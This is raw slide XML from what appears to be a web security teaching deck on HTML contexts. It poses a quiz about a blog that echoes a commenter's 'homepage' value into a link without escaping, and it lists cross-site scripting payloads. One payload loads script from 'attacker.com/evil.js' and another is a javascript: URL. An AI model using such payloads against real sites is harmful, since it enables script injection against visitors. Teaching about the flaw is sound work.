              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8388095" y="24881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CF8E2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336031" y="3000247"/>
            <a:ext cx="1297092" cy="254557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="847">
              <a:lnSpc>
                <a:spcPts val="1933"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="2841685"/>
            <a:ext cx="10522373" cy="428387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5975624" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execution?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="37073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DFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="3970731"/>
            <a:ext cx="8956040" cy="1195860"/>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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/attacker.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">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F0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com/evil.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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F0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:alert("evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>executing");</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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569" y="450638"/>
            <a:ext cx="4629572" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-133" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="731520" y="2488184"/>
            <a:ext cx="7657253" cy="307339"/>
            <a:chOff x="548640" y="1866138"/>
            <a:chExt cx="5742940" cy="230504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="548640" y="1866138"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243840" h="230505">
                  <a:moveTo>
                    <a:pt x="243840" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792480" y="1866137"/>
              <a:ext cx="5131435" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="733031" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611124" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611124" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="2077199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="5131308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDFBF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5923787" y="1866138"/>
              <a:ext cx="367665" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="367664" h="230505">
                  <a:moveTo>
                    <a:pt x="367284" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1622551"/>
            <a:ext cx="10049933" cy="1161280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> blogging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accepts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13"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‘homepage’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commenter.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> The application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>helpful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link:</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2485"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href='"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"'&gt;Home&lt;/a&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8388095" y="24881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CF8E2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
